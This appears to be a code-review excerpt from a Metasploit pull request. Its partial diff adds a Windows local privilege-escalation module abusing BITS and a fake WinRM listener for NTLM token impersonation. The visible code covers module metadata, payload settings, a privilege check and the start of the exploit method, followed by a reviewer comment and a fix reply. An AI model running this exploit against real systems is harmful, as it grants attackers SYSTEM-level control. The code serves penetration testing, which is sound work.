modules/exploits/windows/local/bits_ntlm_token_impersonation.rb

```diff
@@ -0,0 +1,162 @@
+        (Fake WinRM on port 5985 and HTTP on port 80), a firewall popup
+        may appear on target screen. Thus, this exploit is not completely
+        silent.
+
+        - A powershell windows flashes on target screen
+
+        This exploit has been successful on :
+        Windows 10 (10.0 Build 19041) 32 bits
+
+
+        - Windows servers are not vulnerable because a genuine WinRM
+          service is already running.
+
+        - SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are
+          required.
+
+        - BITS must not be running.
+      ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+            [
+                'Cassandre', # Adapted decoder's POC for metasploit
+                'decoder', # Lonely / Juicy Potato. Has written the POC
+                'splinter_code',
+                '0xea31',
+            ],
+        'Arch'           => [ARCH_X86, ARCH_X64],
+        'Platform'       => 'win',
+        'SessionTypes'   => ['meterpreter'],
+        'DefaultOptions' =>
+            {
+                'EXITFUNC' => 'none',
+                'WfsDelay' => '20'
+            },
+        'Targets'        =>
+            [
+                ['Automatic', {}]
+            ],
+        'Payload'         =>
+            {
+                'Space'       => 2048,
+                'DisableNops' => true,
+                'BadChars'    => "\x00"
+            },
+        'References'      =>
+            [
+                ['URL', 'https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/'],
+                ['URL', 'https://github.com/antonioCoco/RogueWinRM'],
+            ],
+        'DisclosureDate' => 'Dec 06 2019',
+        'DefaultTarget'  => 0
+    }))
+  end
+
+
+
+  def check
+    os = client.sys.config.sysinfo['OS']
+    build = os.match(/Build (\d+)/)
+    privs = client.sys.config.getprivs
+    # Fast fails
+    if !((privs.include?('SeImpersonatePrivilege')) || (privs.include?('SeAssignPrimaryTokenPrivilege')))
+      print_bad("Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.")
+      return Exploit::CheckCode::Safe
+    end
+    if (os =~ /Server/)
+      print_bad("Windows servers are not vulnerable.")
+      return Exploit::CheckCode::Safe
+    end
+    # Windows 10 after build 17134 (April 2018 update, version 1803) is not
+    # vulnerable. Due to changes in OS names, detecting the difference between
+    # Server 2016/19 is most reliably done with build numbers:
+    # (https://github.com/rapid7/metasploit-payloads/pull/355)
+    print_good("Target appears to be vulnerable (#{os})")
+    return Exploit::CheckCode::Appears
+  end
+
+
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'Target appears not to be vulnerable.')
+    end
```

Comment:
This looks like it could be replaced with the `AutoCheck` mixin

Reply:
Fixed by commit [7364758017749b2a0cbb0c86ec24ae8db6fdb187](https://github.com/rapid7/metasploit-framework/pull/14046/commits/7364758017749b2a0cbb0c86ec24ae8db6fdb187)